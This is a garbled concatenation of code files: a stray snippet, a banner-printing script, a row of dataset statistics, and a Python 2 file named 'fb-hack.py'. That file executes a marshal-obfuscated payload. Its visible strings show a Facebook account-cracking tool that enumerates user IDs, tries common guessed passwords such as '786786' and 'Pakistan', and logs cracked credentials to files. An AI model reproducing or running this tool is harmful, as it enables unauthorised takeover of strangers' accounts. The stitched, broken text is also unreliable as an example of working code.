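rows = [{'lng': 1.1, 'lat': -2.3}, {'lng': 1.2, 'lat': -2.0}]
js = json.loads(json.dumps(encode_points(rows, ['layer_1', 'layer_2'])))
```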
# --- banner.py (Alperenae/whitebox-framework, MIT license) ---
# COLORS
OKGREEN = '\033[92m'
ENDC = '\033[0m'
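`OKGREEN` and `ENDC` follow the standard ANSI SGR pattern `\033[<code>m ... \033[0m`; a small helper generalizing it (hypothetical, not part of this script):

```python
def colorize(text, code):
    """Wrap text in an ANSI SGR color code and reset afterwards."""
    return '\033[%sm%s\033[0m' % (code, text)
```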
print("")
print("\ \ / / | | (_) | | | _ \ / _| \ \ / / | |")
print(" \ \ /\ / / | |__ _ | |_ ___ | |_) | ___ __ __ ______ | |_ _ __ __ _ _ __ ___ ___ \ \ /\ / / ___ _ __ | | __")
print(" \ \/ \/ / | '_ \ | | | __| / _ \ | _ < / _ \ \ \/ / |______| | _| | '__| / _` | | '_ ` _ \ / _ \ \ \/ \/ / / _ \ | '__| | |/ /")
print(" \ /\ / | | | | | | | |_ | __/ | |_) | | (_) | > < | | | | | (_| | | | | | | | | __/ \ /\ / | (_) | | | | <")
print(" \/ \/ |_| |_| |_| \__| \___| |____/ \___/ /_/\_\ |_| |_| \__,_| |_| |_| |_| \___| \/ \/ \___/ |_| |_|\_/")
print( OKGREEN+" v.0.1" + ENDC)
| 98.6875 | 236 | 0.120329 | 19 | 1,579 | 4.052632 | 0.526316 | 0.779221 | 0.974026 | 1.038961 | 0.454545 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0.025463 | 0.726409 | 1,579 | 16 | 237 | 98.6875 | 0.152778 | 0.0038 | 0 | 0 | 0 | 0.555556 | 0.521629 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.777778 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
846a43d85ea3558d7935b77a5c54cb68d51d652b | 64,091 | py | Python | fb-hack.py | GHOST-PSYCHO/FB-HACKING-TOOL | 339c6afd32fa93b0de7e486ac7cb2ba51a23a8c1 | [
"Apache-2.0"
] | null | null | null | fb-hack.py | GHOST-PSYCHO/FB-HACKING-TOOL | 339c6afd32fa93b0de7e486ac7cb2ba51a23a8c1 | [
"Apache-2.0"
] | null | null | null | fb-hack.py | GHOST-PSYCHO/FB-HACKING-TOOL | 339c6afd32fa93b0de7e486ac7cb2ba51a23a8c1 | [
"Apache-2.0"
] | 1 | 2020-08-02T08:36:40.000Z | 2020-08-02T08:36:40.000Z | #The Credit For This Code Goes To Alamin Islam
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Developer Alamin Islam
#Reserved2020
#Github : https://github.com/GHOST-PSYCHO
#Don't Try Edit or Modify This Script Otherwise I will Interrupt
import marshal
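The `exec(marshal.loads(...))` call below decodes a pre-compiled, `marshal`-serialized code object and runs it, which is how this script hides its source. A harmless illustration of the same mechanism:

```python
import marshal

# Serialize a compiled code object, then decode and execute it --
# the same wrapper pattern as the exec(marshal.loads(...)) call below.
demo_code = compile("result = 2 + 2", "<demo>", "exec")
demo_blob = marshal.dumps(demo_code)
demo_ns = {}
exec(marshal.loads(demo_blob), demo_ns)
# demo_ns['result'] is now 4
```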
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x90\x02\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01d\x00\x00d\x03\x00l\x0f\x00m\x10\x00Z\x10\x00\x01d\x00\x00d\x04\x00l\x0c\x00m\x11\x00Z\x11\x00\x01e\x12\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x13\x00d\x05\x00\x83\x01\x00\x01e\x0c\x00j\x11\x00\x83\x00\x00Z\x14\x00e\x14\x00j\x15\x00e\x16\x00\x83\x01\x00\x01e\x14\x00j\x17\x00e\x0c\x00j\x18\x00j\x19\x00\x83\x00\x00d\x06\x00d\x07\x00\x83\x01\x01\x01d\x08\x00d\t\x00f\x02\x00g\x01\x00e\x14\x00_\x1a\x00d\n\x00\x84\x00\x00Z\x1b\x00d\x0b\x00\x84\x00\x00Z\x1c\x00d\x0c\x00\x84\x00\x00Z\x1d\x00d\r\x00\x84\x00\x00Z\x1e\x00d\x0e\x00Z\x1f\x00d\x0f\x00\x84\x00\x00Z \x00d\x10\x00Z!\x00g\x00\x00Z"\x00g\x00\x00Z#\x00g\x00\x00a$\x00g\x00\x00Z%\x00g\x00\x00Z&\x00d\x11\x00Z\'\x00d\x12\x00Z(\x00e\x00\x00j)\x00d\x13\x00\x83\x01\x00\x01d\x14\x00GHe\x1e\x00d\x15\x00\x83\x01\x00\x01d\x16\x00GHd\x17\x00Z*\x00d\x18\x00Z+\x00d\x19\x00Z,\x00x\x86\x00e,\x00d\x19\x00k\x02\x00rH\x02e-\x00d\x1a\x00\x83\x01\x00Z.\x00e.\x00e*\x00k\x02\x00r3\x02e-\x00d\x1b\x00\x83\x01\x00Z/\x00e/\x00e+\x00k\x02\x00r\x1e\x02d\x1c\x00e.\x00\x17GHe\x02\x00j0\x00d\x1d\x00\x83\x01\x00\x01d\x1e\x00Z,\x00n\x12\x00d\x1f\x00GHe\x00\x00j)\x00d \x00\x83\x01\x00\x01n\x12\x00d!\x00GHe\x00\x00j)\x00d 
\x00\x83\x01\x00\x01q\xc3\x01Wd"\x00\x84\x00\x00Z1\x00d#\x00\x84\x00\x00Z2\x00d$\x00\x84\x00\x00Z3\x00d%\x00\x84\x00\x00Z4\x00d&\x00\x84\x00\x00Z5\x00e6\x00d\'\x00k\x02\x00r\x8c\x02e1\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S((\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x0b\x00\x00\x00\x1b[1;91mExit(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x06\x00\x00\x00keluar\x16\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00t\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x01\x00j\x02\x00d\x04\x00t\x03\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x04\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00ahtdzjct\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x05\x00\x00\x00t\x01\x00\x00\x00xt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x04\x00\x00\x00acak\x1b\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x01c\x01\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x04\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x0
0t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x04\x00q\r\x00W|\x04\x00d\x05\x007}\x04\x00|\x04\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x04\x00t\x03\x00j\x04\x00j\x05\x00|\x04\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\t\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x06\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x05\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x14\x00\x00\x00t\x01\x00\x00\x00jR\x0c\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x10\x00\x00\x00#\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng-C\x1c\xeb\xe26\x1a?(\x06\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x05\x00\x00\x00jalan-\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\xf8\n\x00\x00\n\x1b[1;94m\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\
x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa6\xe2\x95\x9d\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\
x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa6\xe2\x95\x9d\xe2\x80\x83\xe2\x80\x83\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;94m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x80\x83\xe2\x80\x83\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\n\n\x1b[1;96m\xe2\x95\xad\xe2\x94\x81\xe2\x94\x81\xe2\x95\xae\n\x1b[1;96m\xe2\x94\x83\xe2\x95\xad\xe2\x95\xae\xe2\x94\x83\n\x1b[1;96m\xe2\x94\x83\xe2\x95\xb0\xe2\x95\xaf\xe2\x95\xb0\xe2\x94\xb3\xe2\x95\xae\xe2\x95\xb1\xe2\x95\xad\xe2\x95\xae\n\x1b[1;96m\xe2\x94\x83\xe2\x95\xad\xe2\x94\x81\xe2\x95\xae\xe2\x94\x83\xe2\x94\x83\xe2\x95\xb1\xe2\x94\x83\xe2\x94\x83\n\x1b[1;96m\xe2\x94\x83\xe2\x95\xb0\xe2\x94\x81\xe2\x95\xaf\xe2\x94\x83\xe2\x95\xb0\xe2\x94\x81\xe2\x95\xaf\xe2\x94\x83\n\x1b[1;96m\xe2\x95\xb0\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\xbb\xe2\x94\x81\xe2\x95\xae\xe2\x95\xad\xe2\x95\xaf\n\x1b[1;96m\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xad\xe2\x94\x81\xe2\x95\xaf\xe2\x94\x83\n\x1b[1;96m\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb1\xe2\x95\xb0\xe2\x94\x81\xe2\x94\x81\xe2\x95\xaf\n\n\x1b[1;92m\xe2\x96\
x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\
\x1b[1;93ms9\x00\x00\x00\x1b[1;93m[\xe2\x80\xa2\xe2\x8a\xb1\xe2\x9c\xbf\xe2\x8a\xb0\xe2\x80\xa2] \x1b[1;93mID \x1b[1;93m : \x1b[1;93ms9\x00\x00\x00\x1b[1;93m[\xe2\x80\xa2\xe2\x8a\xb1\xe2\x9c\xbf\xe2\x8a\xb0\xe2\x80\xa2] \x1b[1;93mPassword \x1b[1;93m: \x1b[1;93ms\x10\x00\x00\x00out/super_cp.txtRe\x00\x00\x00s\x03\x00\x00\x00ID:s\x04\x00\x00\x00 Pw:t\x03\x00\x00\x00123t\t\x00\x00\x00last_namet\x04\x00\x00\x00khant\x06\x00\x00\x00786786t\x08\x00\x00\x00Pakistant\x05\x00\x00\x0012345t\x03\x00\x00\x00786(\x12\x00\x00\x00R\x05\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrorRW\x00\x00\x00RX\x00\x00\x00R`\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00t\x06\x00\x00\x00urllibt\x07\x00\x00\x00urlopent\x04\x00\x00\x00loadt\x03\x00\x00\x00okst\x06\x00\x00\x00appendRC\x00\x00\x00R\x1a\x00\x00\x00R\\\x00\x00\x00t\x08\x00\x00\x00cekpoint(\x12\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userRe\x00\x00\x00R\x11\x00\x00\x00t\x05\x00\x00\x00pass1Rd\x00\x00\x00t\x01\x00\x00\x00qR\x0c\x00\x00\x00R\x1f\x00\x00\x00t\x03\x00\x00\x00cekt\x05\x00\x00\x00pass2t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5t\x05\x00\x00\x00pass6t\x05\x00\x00\x00pass7t\x05\x00\x00\x00pass8t\x05\x00\x00\x00pass9(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x04\x00\x00\x00main9\x01\x00\x00s|\x01\x00\x00\x00\x02\x06\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x1b\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x06\x01\x1f\x01\
x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x14\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\n\x01\x18\x04\x03\x01i\x1e\x00\x00\x00s\xaa\x00\x00\x00\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;91mB4\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2s=\x00\x00\x00 \x1b[1;91m\xc2\xab---\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2---Developed By Shabir--\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2---\xc2\xbbse\x00\x00\x00\x1b[1;93m\xe2\x9c\x85Process Has Been Completed Press\xe2\x9e\xa1 Ctrl+Z.\xe2\x86\xa9 Next Type (python2 fb-hack.py)\xe2\x86\xa9\x1b[1;97m....s*\x00\x00\x00\x1b[1;91mTotal OK/\x1b[1;95mCP \x1b[1;93m: \x1b[1;91ms\x0f\x00\x00\x00\x1b[1;93m/\x1b[1;95ms-\t\x00\x00\n 
\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6..$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\n\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6$$\xe2\x80\xa6\xe2\x80\xa6\xe2\x80\xa6\xe2